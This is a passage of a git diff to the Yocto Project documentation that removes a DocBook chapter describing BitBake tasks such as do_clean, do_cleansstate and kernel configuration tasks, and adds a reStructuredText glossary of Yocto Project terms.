-            You can change these variables inside your recipe if you need
-            to make additional (or fewer) directories available to other
-            recipes at build time.
-        </para>
-
-        <para>
-            The <filename>do_populate_sysroot</filename> task is a
-            shared state (sstate) task, which means that the task can
-            be accelerated through sstate use.
-            Realize also that if the task is re-executed, any previous output
-            is removed (i.e. "cleaned").
-        </para>
-    </section>
-
-    <section id='ref-tasks-prepare_recipe_sysroot'>
-        <title><filename>do_prepare_recipe_sysroot</filename></title>
-
-        <para>
-            Installs the files into the individual recipe specific sysroots
-            (i.e. <filename>recipe-sysroot</filename> and
-            <filename>recipe-sysroot-native</filename> under
-            <filename>${</filename><link linkend='var-WORKDIR'><filename>WORKDIR</filename></link><filename>}</filename>
-            based upon the dependencies specified by
-            <link linkend='var-DEPENDS'><filename>DEPENDS</filename></link>).
-            See the
-            "<link linkend='ref-classes-staging'><filename>staging</filename></link>"
-            class for more information.
-        </para>
-    </section>
-
-    <section id='ref-tasks-rm_work'>
-        <title><filename>do_rm_work</filename></title>
-
-        <para>
-            Removes work files after the OpenEmbedded build system has
-            finished with them.
-            You can learn more by looking at the
-            "<link linkend='ref-classes-rm-work'><filename>rm_work.bbclass</filename></link>"
-            section.
-        </para>
-    </section>
-
-    <section id='ref-tasks-unpack'>
-        <title><filename>do_unpack</filename></title>
-
-        <para>
-            Unpacks the source code into a working directory pointed to
-            by
-            <filename>${</filename><link linkend='var-WORKDIR'><filename>WORKDIR</filename></link><filename>}</filename>.
-            The
-            <link linkend='var-S'><filename>S</filename></link> variable also
-            plays a role in where unpacked source files ultimately reside.
-            For more information on how source files are unpacked, see the
-            "<ulink url='&YOCTO_DOCS_OM_URL;#source-fetching-dev-environment'>Source Fetching</ulink>"
-            section in the Yocto Project Overview and Concepts Manual and also
-            see the <filename>WORKDIR</filename> and
-            <filename>S</filename> variable descriptions.
-        </para>
-    </section>
-</section>
-
-<section id='manually-called-tasks'>
-    <title>Manually Called Tasks</title>
-
-    <para>
-        These tasks are typically manually triggered (e.g. by using the
-        <filename>bitbake -c</filename> command-line option):
-    </para>
-
-    <section id='ref-tasks-checkpkg'>
-        <title><filename>do_checkpkg</filename></title>
-
-        <para>
-            Provides information about the recipe including its upstream
-            version and status.
-            The upstream version and status reveals whether or not a version
-            of the recipe exists upstream and a status of not updated, updated,
-            or unknown.
-        </para>
-
-        <para>
-            To check the upstream version and status of a recipe, use the
-            following devtool commands:
-            <literallayout class='monospaced'>
-     $ devtool latest-version
-     $ devtool check-upgrade-status
-            </literallayout>
-            See the
-            "<link linkend='ref-devtool-reference'><filename>devtool</filename> Quick Reference</link>"
-            chapter for more information on <filename>devtool</filename>.
-            See the
-            "<ulink url='&YOCTO_DOCS_REF_URL;#devtool-checking-on-the-upgrade-status-of-a-recipe'>Checking on the Upgrade Status of a Recipe</ulink>"
-            section for information on checking the upgrade status of a recipe.
-        </para>
-
-        <para>
-            To build the <filename>checkpkg</filename> task, use the
-            <filename>bitbake</filename> command with the "-c" option and
-            task name:
-            <literallayout class='monospaced'>
-     $ bitbake core-image-minimal -c checkpkg
-            </literallayout>
-            By default, the results are stored in
-            <link linkend='var-LOG_DIR'><filename>$LOG_DIR</filename></link>
-            (e.g. <filename>$BUILD_DIR/tmp/log</filename>).
-        </para>
-    </section>
-
-    <section id='ref-tasks-checkuri'>
-        <title><filename>do_checkuri</filename></title>
-
-        <para>
-            Validates the
-            <link linkend='var-SRC_URI'><filename>SRC_URI</filename></link>
-            value.
-        </para>
-    </section>
-
-    <section id='ref-tasks-clean'>
-        <title><filename>do_clean</filename></title>
-
-        <para>
-            Removes all output files for a target from the
-            <link linkend='ref-tasks-unpack'><filename>do_unpack</filename></link>
-            task forward (i.e. <filename>do_unpack</filename>,
-            <link linkend='ref-tasks-configure'><filename>do_configure</filename></link>,
-            <link linkend='ref-tasks-compile'><filename>do_compile</filename></link>,
-            <link linkend='ref-tasks-install'><filename>do_install</filename></link>,
-            and
-            <link linkend='ref-tasks-package'><filename>do_package</filename></link>).
-        </para>
-
-        <para>
-            You can run this task using BitBake as follows:
-            <literallayout class='monospaced'>
-     $ bitbake -c clean <replaceable>recipe</replaceable>
-            </literallayout>
-        </para>
-
-        <para>
-            Running this task does not remove the
-            <ulink url='&YOCTO_DOCS_OM_URL;#shared-state-cache'>sstate</ulink>
-            cache files.
-            Consequently, if no changes have been made and the recipe is
-            rebuilt after cleaning, output files are simply restored from the
-            sstate cache.
-            If you want to remove the sstate cache files for the recipe,
-            you need to use the
-            <link linkend='ref-tasks-cleansstate'><filename>do_cleansstate</filename></link>
-            task instead (i.e. <filename>bitbake -c cleansstate</filename> <replaceable>recipe</replaceable>).
-        </para>
-    </section>
-
-    <section id='ref-tasks-cleanall'>
-        <title><filename>do_cleanall</filename></title>
-
-        <para>
-            Removes all output files, shared state
-            (<ulink url='&YOCTO_DOCS_OM_URL;#shared-state-cache'>sstate</ulink>)
-            cache, and downloaded source files for a target (i.e. the contents
-            of
-            <link linkend='var-DL_DIR'><filename>DL_DIR</filename></link>).
-            Essentially, the <filename>do_cleanall</filename> task is
-            identical to the
-            <link linkend='ref-tasks-cleansstate'><filename>do_cleansstate</filename></link>
-            task with the added removal of downloaded source files.
-        </para>
-
-        <para>
-            You can run this task using BitBake as follows:
-            <literallayout class='monospaced'>
-     $ bitbake -c cleanall <replaceable>recipe</replaceable>
-            </literallayout>
-        </para>
-
-        <para>
-            Typically, you would not normally use the
-            <filename>cleanall</filename> task.
-            Do so only if you want to start fresh with the
-            <link linkend='ref-tasks-fetch'><filename>do_fetch</filename></link>
-            task.
-        </para>
-    </section>
-
-    <section id='ref-tasks-cleansstate'>
-        <title><filename>do_cleansstate</filename></title>
-
-        <para>
-            Removes all output files and shared state
-            (<ulink url='&YOCTO_DOCS_OM_URL;#shared-state-cache'>sstate</ulink>)
-            cache for a target.
-            Essentially, the <filename>do_cleansstate</filename> task is
-            identical to the
-            <link linkend='ref-tasks-clean'><filename>do_clean</filename></link>
-            task with the added removal of shared state
-            (<ulink url='&YOCTO_DOCS_OM_URL;#shared-state-cache'>sstate</ulink>)
-            cache.
-        </para>
-
-        <para>
-            You can run this task using BitBake as follows:
-            <literallayout class='monospaced'>
-     $ bitbake -c cleansstate <replaceable>recipe</replaceable>
-            </literallayout>
-        </para>
-
-        <para>
-            When you run the <filename>do_cleansstate</filename> task,
-            the OpenEmbedded build system no longer uses any
-            sstate.
-            Consequently, building the recipe from scratch is guaranteed.
-            <note>
-                The <filename>do_cleansstate</filename> task cannot remove
-                sstate from a remote sstate mirror.
-                If you need to build a target from scratch using remote
-                mirrors, use the "-f" option as follows:
-                <literallayout class='monospaced'>
-     $ bitbake -f -c do_cleansstate <replaceable>target</replaceable>
-                </literallayout>
-            </note>
-        </para>
-     </section>
-
-    <section id='ref-tasks-devpyshell'>
-        <title><filename>do_devpyshell</filename></title>
-
-        <para>
-            Starts a shell in which an interactive Python interpreter allows
-            you to interact with the BitBake build environment.
-            From within this shell, you can directly examine and set
-            bits from the data store and execute functions as if within
-            the BitBake environment.
-            See the
-            "<ulink url='&YOCTO_DOCS_DEV_URL;#platdev-appdev-devpyshell'>Using a Development Python Shell</ulink>"
-            section in the Yocto Project Development Tasks Manual for more
-            information about using <filename>devpyshell</filename>.
-        </para>
-    </section>
-
-    <section id='ref-tasks-devshell'>
-        <title><filename>do_devshell</filename></title>
-
-        <para>
-            Starts a shell whose environment is set up for
-            development, debugging, or both.
-            See the
-            "<ulink url='&YOCTO_DOCS_DEV_URL;#platdev-appdev-devshell'>Using a Development Shell</ulink>"
-            section in the Yocto Project Development Tasks Manual for more
-            information about using <filename>devshell</filename>.
-        </para>
-    </section>
-
-    <section id='ref-tasks-listtasks'>
-        <title><filename>do_listtasks</filename></title>
-
-        <para>
-            Lists all defined tasks for a target.
-        </para>
-    </section>
-
-    <section id='ref-tasks-package_index'>
-        <title><filename>do_package_index</filename></title>
-
-        <para>
-            Creates or updates the index in the
-            <ulink url='&YOCTO_DOCS_OM_URL;#package-feeds-dev-environment'>Package Feeds</ulink>
-            area.
-            <note>
-                This task is not triggered with the
-                <filename>bitbake -c</filename> command-line option as
-                are the other tasks in this section.
-                Because this task is specifically for the
-                <filename>package-index</filename> recipe,
-                you run it using
-                <filename>bitbake package-index</filename>.
-            </note>
-        </para>
-    </section>
-</section>
-
-<section id='image-related-tasks'>
-    <title>Image-Related Tasks</title>
-
-    <para>
-        The following tasks are applicable to image recipes.
-    </para>
-
-    <section id='ref-tasks-bootimg'>
-        <title><filename>do_bootimg</filename></title>
-
-        <para>
-            Creates a bootable live image.
-            See the
-            <link linkend='var-IMAGE_FSTYPES'><filename>IMAGE_FSTYPES</filename></link>
-            variable for additional information on live image types.
-        </para>
-    </section>
-
-    <section id='ref-tasks-bundle_initramfs'>
-        <title><filename>do_bundle_initramfs</filename></title>
-
-        <para>
-            Combines an initial RAM disk (initramfs) image and kernel
-            together to form a single image.
-            The
-            <link linkend='var-CONFIG_INITRAMFS_SOURCE'><filename>CONFIG_INITRAMFS_SOURCE</filename></link>
-            variable has some more information about these types of images.
-        </para>
-    </section>
-
-    <section id='ref-tasks-rootfs'>
-        <title><filename>do_rootfs</filename></title>
-
-        <para>
-            Creates the root filesystem (file and directory structure) for an
-            image.
-            See the
-            "<ulink url='&YOCTO_DOCS_OM_URL;#image-generation-dev-environment'>Image Generation</ulink>"
-            section in the Yocto Project Overview and Concepts Manual for more
-            information on how the root filesystem is created.
-        </para>
-    </section>
-
-    <section id='ref-tasks-testimage'>
-        <title><filename>do_testimage</filename></title>
-
-        <para>
-            Boots an image and performs runtime tests within the image.
-            For information on automatically testing images, see the
-            "<ulink url='&YOCTO_DOCS_DEV_URL;#performing-automated-runtime-testing'>Performing Automated Runtime Testing</ulink>"
-            section in the Yocto Project Development Tasks Manual.
-        </para>
-    </section>
-
-    <section id='ref-tasks-testimage_auto'>
-        <title><filename>do_testimage_auto</filename></title>
-
-        <para>
-            Boots an image and performs runtime tests within the image
-            immediately after it has been built.
-            This task is enabled when you set
-            <link linkend='var-TESTIMAGE_AUTO'><filename>TESTIMAGE_AUTO</filename></link>
-            equal to "1".
-        </para>
-
-        <para>
-            For information on automatically testing images, see the
-            "<ulink url='&YOCTO_DOCS_DEV_URL;#performing-automated-runtime-testing'>Performing Automated Runtime Testing</ulink>"
-            section in the Yocto Project Development Tasks Manual.
-        </para>
-    </section>
-</section>
-
-<section id='kernel-related-tasks'>
-    <title>Kernel-Related Tasks</title>
-
-    <para>
-        The following tasks are applicable to kernel recipes.
-        Some of these tasks (e.g. the
-        <link linkend='ref-tasks-menuconfig'><filename>do_menuconfig</filename></link>
-        task) are also applicable to recipes that use
-        Linux kernel style configuration such as the BusyBox recipe.
-    </para>
-
-    <section id='ref-tasks-compile_kernelmodules'>
-        <title><filename>do_compile_kernelmodules</filename></title>
-
-        <para>
-            Runs the step that builds the kernel modules (if needed).
-            Building a kernel consists of two steps: 1) the kernel
-            (<filename>vmlinux</filename>) is built, and 2) the modules
-            are built (i.e. <filename>make modules</filename>).
-        </para>
-    </section>
-
-    <section id='ref-tasks-diffconfig'>
-        <title><filename>do_diffconfig</filename></title>
-
-        <para>
-            When invoked by the user, this task creates a file containing the
-            differences between the original config as produced by
-            <link linkend='ref-tasks-kernel_configme'><filename>do_kernel_configme</filename></link>
-            task and the changes made by the user with other methods
-            (i.e. using
-            (<link linkend='ref-tasks-kernel_menuconfig'><filename>do_kernel_menuconfig</filename></link>).
-            Once the file of differences is created, it can be used to create
-            a config fragment that only contains the differences.
-            You can invoke this task from the command line as follows:
-            <literallayout class='monospaced'>
-     $ bitbake linux-yocto -c diffconfig
-            </literallayout>
-            For more information, see the
-            "<ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;#creating-config-fragments'>Creating Configuration Fragments</ulink>"
-            section in the Yocto Project Linux Kernel Development Manual.
-        </para>
-    </section>
-
-    <section id='ref-tasks-kernel_checkout'>
-        <title><filename>do_kernel_checkout</filename></title>
-
-        <para>
-            Converts the newly unpacked kernel source into a form with which
-            the OpenEmbedded build system can work.
-            Because the kernel source can be fetched in several different ways,
-            the <filename>do_kernel_checkout</filename> task makes sure that
-            subsequent tasks are given a clean working tree copy of the kernel
-            with the correct branches checked out.
-        </para>
-    </section>
-
-    <section id='ref-tasks-kernel_configcheck'>
-        <title><filename>do_kernel_configcheck</filename></title>
-
-        <para>
-            Validates the configuration produced by the
-            <link linkend='ref-tasks-kernel_menuconfig'><filename>do_kernel_menuconfig</filename></link>
-            task.
-            The <filename>do_kernel_configcheck</filename> task produces
-            warnings when a requested configuration does not appear in the
-            final <filename>.config</filename> file or when you override a
-            policy configuration in a hardware configuration fragment.
-            You can run this task explicitly and view the output by using
-            the following command:
-            <literallayout class='monospaced'>
-     $ bitbake linux-yocto -c kernel_configcheck -f
-            </literallayout>
-            For more information, see the
-            "<ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;#validating-configuration'>Validating Configuration</ulink>"
-            section in the Yocto Project Linux Kernel Development Manual.
-        </para>
-    </section>
-
-    <section id='ref-tasks-kernel_configme'>
-        <title><filename>do_kernel_configme</filename></title>
-
-        <para>
-            After the kernel is patched by the
-            <link linkend='ref-tasks-patch'><filename>do_patch</filename></link>
-            task, the <filename>do_kernel_configme</filename> task assembles
-            and merges all the kernel config fragments into a merged
-            configuration that can then be passed to the kernel configuration
-            phase proper.
-            This is also the time during which user-specified defconfigs
-            are applied if present, and where configuration modes such as
-            <filename>--allnoconfig</filename> are applied.
-        </para>
-    </section>
-
-    <section id='ref-tasks-kernel_menuconfig'>
-        <title><filename>do_kernel_menuconfig</filename></title>
-
-        <para>
-            Invoked by the user to manipulate the
-            <filename>.config</filename> file used to build a linux-yocto
-            recipe.
-            This task starts the Linux kernel configuration tool, which you
-            then use to modify the kernel configuration.
-            <note>
-                You can also invoke this tool from the command line as
-                follows:
-                <literallayout class='monospaced'>
-     $ bitbake linux-yocto -c menuconfig
-                </literallayout>
-            </note>
-            See the
-            "<ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;#using-menuconfig'>Using <filename>menuconfig</filename></ulink>"
-            section in the Yocto Project Linux Kernel Development Manual
-            for more information on this configuration tool.
-        </para>
-    </section>
-
-    <section id='ref-tasks-kernel_metadata'>
-        <title><filename>do_kernel_metadata</filename></title>
-
-        <para>
-            Collects all the features required for a given kernel build,
-            whether the features come from
-            <link linkend='var-SRC_URI'><filename>SRC_URI</filename></link>
-            or from Git repositories.
-            After collection, the <filename>do_kernel_metadata</filename> task
-            processes the features into a series of config fragments and
-            patches, which can then be applied by subsequent tasks such as
-            <link linkend='ref-tasks-patch'><filename>do_patch</filename></link>
-            and
-            <link linkend='ref-tasks-kernel_configme'><filename>do_kernel_configme</filename></link>.
-        </para>
-    </section>
-
-    <section id='ref-tasks-menuconfig'>
-        <title><filename>do_menuconfig</filename></title>
-
-        <para>
-            Runs <filename>make menuconfig</filename> for the kernel.
-            For information on <filename>menuconfig</filename>, see the
-            "<ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;#using-menuconfig'>Using&nbsp;&nbsp;<filename>menuconfig</filename></ulink>"
-            section in the Yocto Project Linux Kernel Development Manual.
-        </para>
-    </section>
-
-    <section id='ref-tasks-savedefconfig'>
-        <title><filename>do_savedefconfig</filename></title>
-
-        <para>
-            When invoked by the user, creates a defconfig file that can be
-            used instead of the default defconfig.
-            The saved defconfig contains the differences between the default
-            defconfig and the changes made by the user using other methods
-            (i.e. the
-            <link linkend='ref-tasks-kernel_menuconfig'><filename>do_kernel_menuconfig</filename></link>
-            task.
-            You can invoke the task using the following command:
-            <literallayout class='monospaced'>
-     $ bitbake linux-yocto -c savedefconfig
-            </literallayout>
-        </para>
-    </section>
-
-    <section id='ref-tasks-shared_workdir'>
-        <title><filename>do_shared_workdir</filename></title>
-
-        <para>
-            After the kernel has been compiled but before the kernel modules
-            have been compiled, this task copies files required for module
-            builds and which are generated from the  kernel build into the
-            shared work directory.
-            With these copies successfully copied, the
-            <link linkend='ref-tasks-compile_kernelmodules'><filename>do_compile_kernelmodules</filename></link>
-            task can successfully build the kernel modules in the next step
-            of the build.
-        </para>
-    </section>
-
-    <section id='ref-tasks-sizecheck'>
-        <title><filename>do_sizecheck</filename></title>
-
-        <para>
-            After the kernel has been built, this task checks the size of the
-            stripped kernel image against
-            <link linkend='var-KERNEL_IMAGE_MAXSIZE'><filename>KERNEL_IMAGE_MAXSIZE</filename></link>.
-            If that variable was set and the size of the stripped kernel
-            exceeds that size, the kernel build produces a warning to that
-            effect.
-        </para>
-    </section>
-
-    <section id='ref-tasks-strip'>
-        <title><filename>do_strip</filename></title>
-
-        <para>
-            If
-            <filename>KERNEL_IMAGE_STRIP_EXTRA_SECTIONS</filename> is defined,
-            this task strips the sections named in that variable from
-            <filename>vmlinux</filename>.
-            This stripping is typically used to remove nonessential sections
-            such as <filename>.comment</filename> sections from a
-            size-sensitive configuration.
-        </para>
-    </section>
-
-    <section id='ref-tasks-validate_branches'>
-        <title><filename>do_validate_branches</filename></title>
-
-        <para>
-            After the kernel is unpacked but before it is patched, this task
-            makes sure that the machine and metadata branches as specified
-            by the <link linkend='var-SRCREV'><filename>SRCREV</filename></link>
-            variables actually exist on the specified branches.
-            If these branches do not exist and
-            <link linkend='var-AUTOREV'><filename>AUTOREV</filename></link>
-            is not being used, the <filename>do_validate_branches</filename>
-            task fails during the build.
-        </para>
-    </section>
-</section>
-
-<section id='miscellaneous-tasks'>
-    <title>Miscellaneous Tasks</title>
-
-    <para>
-        The following sections describe miscellaneous tasks.
-    </para>
-
-    <section id='ref-tasks-spdx'>
-        <title><filename>do_spdx</filename></title>
-
-        <para>
-            A build stage that takes the source code and scans it on a remote
-            FOSSOLOGY server in order to produce an SPDX document.
-            This task applies only to the
-            <link linkend='ref-classes-spdx'><filename>spdx</filename></link>
-            class.
-        </para>
-    </section>
-</section>
-
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/ref-manual/ref-terms.rst b/documentation/ref-manual/ref-terms.rst
new file mode 100644
index 0000000000..b4ceebc0bb
--- /dev/null
+++ b/documentation/ref-manual/ref-terms.rst
@@ -0,0 +1,394 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+*******************
+Yocto Project Terms
+*******************
+
+Following is a list of terms and definitions users new to the Yocto Project
+development environment might find helpful. While some of these terms are
+universal, the list includes them just in case:
+
+.. glossary::
+
+   :term:`Append Files`
+      Files that append build information to a recipe file.  Append files are
+      known as BitBake append files and ``.bbappend`` files. The OpenEmbedded
+      build system expects every append file to have a corresponding recipe
+      (``.bb``) file. Furthermore, the append file and corresponding recipe file
+      must use the same root filename.  The filenames can differ only in the
+      file type suffix used (e.g. ``formfactor_0.0.bb`` and
+      ``formfactor_0.0.bbappend``).
+
+      Information in append files extends or overrides the information in the
+      similarly-named recipe file. For an example of an append file in use, see
+      the ":ref:`dev-manual/dev-manual-common-tasks:Using .bbappend Files in
+      Your Layer`" section in the Yocto Project Development Tasks Manual.
+
+      When you name an append file, you can use the "``%``" wildcard character
+      to allow for matching recipe names. For example, suppose you have an
+      append file named as follows:
+      ::
+      
+         busybox_1.21.%.bbappend
+
+      That append file
+      would match any ``busybox_1.21.``\ x\ ``.bb`` version of the recipe. So,
+      the append file would match any of the following recipe names:
+
+      .. code-block:: shell
+
+         busybox_1.21.1.bb
+         busybox_1.21.2.bb
+         busybox_1.21.3.bb
+         busybox_1.21.10.bb
+         busybox_1.21.25.bb
+
+      .. note::
+
+         The use of the "%" character is limited in that it only works
+         directly in front of the .bbappend portion of the append file's
+         name. You cannot use the wildcard character in any other location of
+         the name.
+
+   :term:`BitBake`
+      The task executor and scheduler used by the OpenEmbedded build system to
+      build images. For more information on BitBake, see the :doc:`BitBake User
+      Manual <bitbake:index>`.
+
+   :term:`Board Support Package (BSP)`
+      A group of drivers, definitions, and other components that provide support
+      for a specific hardware configuration. For more information on BSPs, see
+      the :ref:`bsp-guide/bsp-guide:Yocto Project Board Support Package
+      Developer's Guide`.
+
+   :term:`Build Directory`
+      This term refers to the area used by the OpenEmbedded build system for
+      builds. The area is created when you ``source`` the setup environment
+      script that is found in the Source Directory
+      (i.e. :ref:`ref-manual/ref-structure:\`\`oe-init-build-env\`\``). The
+      :term:`TOPDIR` variable points to the Build Directory.
+
+      You have a lot of flexibility when creating the Build Directory.
+      Following are some examples that show how to create the directory.  The
+      examples assume your :term:`Source Directory` is named ``poky``:
+
+         -  Create the Build Directory inside your Source Directory and let
+            the name of the Build Directory default to ``build``:
+
+            .. code-block:: shell
+
+               $ cd $HOME/poky
+               $ source oe-init-build-env
+
+         -  Create the Build Directory inside your home directory and
+            specifically name it ``test-builds``:
+
+            .. code-block:: shell
+
+               $ cd $HOME
+               $ source poky/oe-init-build-env test-builds
+
+         -  Provide a directory path and specifically name the Build
+            Directory. Any intermediate folders in the pathname must exist.
+            This next example creates a Build Directory named
+            ``YP-POKYVERSION`` in your home directory within the existing
+            directory ``mybuilds``:
+
+            .. code-block:: shell
+
+               $ cd $HOME
+               $ source $HOME/poky/oe-init-build-env $HOME/mybuilds/YP-POKYVERSION
+
+      .. note::
+
+         By default, the Build Directory contains :term:`TMPDIR`, which is a
+         temporary directory the build system uses for its work. ``TMPDIR`` cannot
+         be under NFS. Thus, by default, the Build Directory cannot be under
+         NFS. However, if you need the Build Directory to be under NFS, you can
+         set this up by setting ``TMPDIR`` in your ``local.conf`` file to use a local
+         drive. Doing so effectively separates ``TMPDIR`` from :term:`TOPDIR`, which is the
+         Build Directory.
+
+   :term:`Build Host`
+      The system used to build images in a Yocto Project Development
+      environment. The build system is sometimes referred to as the development
+      host.
+
+   :term:`Classes`
+      Files that provide for logic encapsulation and inheritance so that
+      commonly used patterns can be defined once and then easily used in
+      multiple recipes. For reference information on the Yocto Project classes,
+      see the ":ref:`ref-manual/ref-classes:Classes`" chapter. Class files end with the
+      ``.bbclass`` filename extension.
+
+   :term:`Configuration File`
+      Files that hold global definitions of variables, user-defined variables,
+      and hardware configuration information. These files tell the OpenEmbedded
+      build system what to build and what to put into the image to support a
+      particular platform.
+
+      Configuration files end with a ``.conf`` filename extension. The
+      :file:`conf/local.conf` configuration file in the :term:`Build Directory`
+      contains user-defined variables that affect every build. The
+      :file:`meta-poky/conf/distro/poky.conf` configuration file defines Yocto
+      "distro" configuration variables used only when building with this
+      policy. Machine configuration files, which are located throughout the
+      :term:`Source Directory`, define variables for specific hardware and are
+      only used when building for that target (e.g. the
+      :file:`machine/beaglebone.conf` configuration file defines variables for
+      the Texas Instruments ARM Cortex-A8 development board).
+
+   :term:`Container Layer`
+      Layers that hold other layers. An example of a container layer is
+      OpenEmbedded's `meta-openembedded
+      <https://github.com/openembedded/meta-openembedded>`_ layer. The
+      ``meta-openembedded`` layer contains many ``meta-*`` layers.
+
+   :term:`Cross-Development Toolchain`
+      In general, a cross-development toolchain is a collection of software
+      development tools and utilities that run on one architecture and allow you
+      to develop software for a different, or targeted, architecture. These
+      toolchains contain cross-compilers, linkers, and debuggers that are
+      specific to the target architecture.
+
+      The Yocto Project supports two different cross-development toolchains:
+
+      - A toolchain only used by and within BitBake when building an image for a
+        target architecture.
+
+      - A relocatable toolchain used outside of BitBake by developers when
+        developing applications that will run on a targeted device.
+
+      Creation of these toolchains is simple and automated. For information on
+      toolchain concepts as they apply to the Yocto Project, see the
+      ":ref:`overview-manual/overview-manual-concepts:Cross-Development
+      Toolchain Generation`" section in the Yocto Project Overview and Concepts
+      Manual. You can also find more information on using the relocatable
+      toolchain in the :ref:`sdk-manual/sdk-manual:Yocto Project Application
+      Development and the Extensible Software Development Kit (eSDK)` manual.
+
+   :term:`Extensible Software Development Kit (eSDK)`
+      A custom SDK for application developers. This eSDK allows developers to
+      incorporate their library and programming changes back into the image to
+      make their code available to other application developers.
+
+      For information on the eSDK, see the :ref:`sdk-manual/sdk-manual:Yocto
+      Project Application Development and the Extensible Software Development
+      Kit (eSDK)` manual.
+
+   :term:`Image`
+      An image is an artifact of the BitBake build process given a collection of
+      recipes and related Metadata. Images are the binary output that run on
+      specific hardware or QEMU and are used for specific use-cases. For a list
+      of the supported image types that the Yocto Project provides, see the
+      ":ref:`ref-manual/ref-images:Images`" chapter.
+
+   :term:`Layer`
+      A collection of related recipes. Layers allow you to consolidate related
+      metadata to customize your build. Layers also isolate information used
+      when building for multiple architectures.  Layers are hierarchical in
+      their ability to override previous specifications. You can include any
+      number of available layers from the Yocto Project and customize the build
+      by adding your layers after them. You can search the Layer Index for
+      layers used within Yocto Project.
+
+      For introductory information on layers, see the
+      ":ref:`overview-manual/overview-manual-yp-intro:The Yocto Project Layer
+      Model`" section in the Yocto Project Overview and Concepts Manual. For
+      more detailed information on layers, see the
+      ":ref:`dev-manual/dev-manual-common-tasks:Understanding and Creating
+      Layers`" section in the Yocto Project Development Tasks Manual. For a
+      discussion specifically on BSP Layers, see the ":ref:`bsp-guide/bsp:BSP
+      Layers`" section in the Yocto Project Board Support Packages (BSP)
+      Developer's Guide.
+
+   :term:`Metadata`
+      A key element of the Yocto Project is the Metadata that
+      is used to construct a Linux distribution and is contained in the
+      files that the :term:`OpenEmbedded Build System`
+      parses when building an image. In general, Metadata includes recipes,
+      configuration files, and other information that refers to the build
+      instructions themselves, as well as the data used to control what
+      things get built and the effects of the build. Metadata also includes
+      commands and data used to indicate what versions of software are
+      used, from where they are obtained, and changes or additions to the
+      software itself (patches or auxiliary files) that are used to fix
+      bugs or customize the software for use in a particular situation.
+      OpenEmbedded-Core is an important set of validated metadata.
+
+      In the context of the kernel ("kernel Metadata"), the term refers to
+      the kernel config fragments and features contained in the
+      :yocto_git:`yocto-kernel-cache </cgit/cgit.cgi/yocto-kernel-cache>`
+      Git repository.
+
+   :term:`OpenEmbedded-Core (OE-Core)`
+      OE-Core is metadata comprised of
+      foundational recipes, classes, and associated files that are meant to
+      be common among many different OpenEmbedded-derived systems,
+      including the Yocto Project. OE-Core is a curated subset of an
+      original repository developed by the OpenEmbedded community that has
+      been pared down into a smaller, core set of continuously validated
+      recipes. The result is a tightly controlled and an quality-assured
+      core set of recipes.
+
+      You can see the Metadata in the ``meta`` directory of the Yocto
+      Project :yocto_git:`Source Repositories </cgit/cgit.cgi/poky>`.
+
+   :term:`OpenEmbedded Build System`
+      The build system specific to the Yocto
+      Project. The OpenEmbedded build system is based on another project
+      known as "Poky", which uses :term:`BitBake` as the task
+      executor. Throughout the Yocto Project documentation set, the
+      OpenEmbedded build system is sometimes referred to simply as "the
+      build system". If other build systems, such as a host or target build
+      system are referenced, the documentation clearly states the
+      difference.
+
+      .. note::
+
+         For some historical information about Poky, see the :term:`Poky` term.
+
+   :term:`Package`
+      In the context of the Yocto Project, this term refers to a
+      recipe's packaged output produced by BitBake (i.e. a "baked recipe").
+      A package is generally the compiled binaries produced from the
+      recipe's sources. You "bake" something by running it through BitBake.
+
+      It is worth noting that the term "package" can, in general, have
+      subtle meanings. For example, the packages referred to in the
+      ":ref:`ref-manual/ref-system-requirements:required packages for the build host`"
+      section are compiled binaries that, when installed, add functionality to
+      your Linux distribution.
+
+      Another point worth noting is that historically within the Yocto
+      Project, recipes were referred to as packages - thus, the existence
+      of several BitBake variables that are seemingly mis-named, (e.g.
+      :term:`PR`, :term:`PV`, and
+      :term:`PE`).
+
+   :term:`Package Groups`
+      Arbitrary groups of software Recipes. You use
+      package groups to hold recipes that, when built, usually accomplish a
+      single task. For example, a package group could contain the recipes
+      for a company's proprietary or value-add software. Or, the package
+      group could contain the recipes that enable graphics. A package group
+      is really just another recipe. Because package group files are
+      recipes, they end with the ``.bb`` filename extension.
+
+   :term:`Poky`
+      Poky, which is pronounced *Pock*-ee, is a reference embedded
+      distribution and a reference test configuration. Poky provides the
+      following:
+
+      -  A base-level functional distro used to illustrate how to customize
+         a distribution.
+
+      -  A means by which to test the Yocto Project components (i.e. Poky
+         is used to validate the Yocto Project).
+
+      -  A vehicle through which you can download the Yocto Project.
+
+      Poky is not a product level distro. Rather, it is a good starting
+      point for customization.
+
+      .. note::
+
+         Poky began as an open-source project initially developed by
+         OpenedHand. OpenedHand developed Poky from the existing
+         OpenEmbedded build system to create a commercially supportable
+         build system for embedded Linux. After Intel Corporation acquired
+         OpenedHand, the poky project became the basis for the Yocto
+         Project's build system.
+
+   :term:`Recipe`
+      A set of instructions for building packages. A recipe
+      describes where you get source code, which patches to apply, how to
+      configure the source, how to compile it and so on. Recipes also
+      describe dependencies for libraries or for other recipes. Recipes
+      represent the logical unit of execution, the software to build, the
+      images to build, and use the ``.bb`` file extension.
+
+   :term:`Reference Kit`
+      A working example of a system, which includes a
+      :term:`BSP<Board Support Package (BSP)>` as well as a
+      :term:`build host<Build Host>` and other components, that can
+      work on specific hardware.
+
+   :term:`Source Directory`
+     This term refers to the directory structure
+     created as a result of creating a local copy of the ``poky`` Git
+     repository ``git://git.yoctoproject.org/poky`` or expanding a
+     released ``poky`` tarball.
+
+     .. note::
+
+        Creating a local copy of the
+        poky
+        Git repository is the recommended method for setting up your
+        Source Directory.
+
+     Sometimes you might hear the term "poky directory" used to refer to
+     this directory structure.
+
+     .. note::
+
+        The OpenEmbedded build system does not support file or directory
+        names that contain spaces. Be sure that the Source Directory you
+        use does not contain these types of names.
+
+     The Source Directory contains BitBake, Documentation, Metadata and
+     other files that all support the Yocto Project. Consequently, you
+     must have the Source Directory in place on your development system in
+     order to do any development using the Yocto Project.
+
+     When you create a local copy of the Git repository, you can name the
+     repository anything you like. Throughout much of the documentation,
+     "poky" is used as the name of the top-level folder of the local copy
+     of the poky Git repository. So, for example, cloning the ``poky`` Git
+     repository results in a local Git repository whose top-level folder
+     is also named "poky".
+
+     While it is not recommended that you use tarball expansion to set up
